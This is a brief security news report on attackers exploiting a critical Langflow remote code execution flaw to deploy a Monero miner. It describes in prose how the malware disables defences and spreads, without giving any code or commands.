Malware

Critical Langflow vulnerability exploited to deploy Monero cryptocurrency miner

Crypto Trading theme with blurred city abstract lights background

Threat actors are actively exploiting a critical vulnerability in Langflow, identified as CVE-2026-33017, to deploy a Monero cryptocurrency miner, according to Trend Micro. This vulnerability, with a CVSS score of 9.3, allows for unauthenticated remote code execution, enabling attackers to gain initial access to enterprise networks by targeting exposed artificial intelligence application endpoints. The exploitation campaign was observed between March 27 and April 15, 2026, with further coverage provided by The Hacker News.

The attack chain begins with a single line of Python code executed via an unauthenticated Langflow API endpoint. This code downloads a shell script that fetches and launches a cryptocurrency miner binary as a detached process. The malware is designed to terminate competing miners from groups like Kinsing and WatchDog, remove rival wallet data, disable security controls, and establish persistence through cron jobs. It also spreads to other systems via reused SSH keys.

The miner binary, written in Go, disables security measures such as AppArmor, UFW, iptables, SELinux, and cloud security agents. It also removes system logs and manipulates file attributes to maintain its presence. The campaign highlights how exposed AI application endpoints are becoming a new entry point for threat actors.

Source: The Hacker News

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

Related Terms

Adware

You can skip this ad in 5 seconds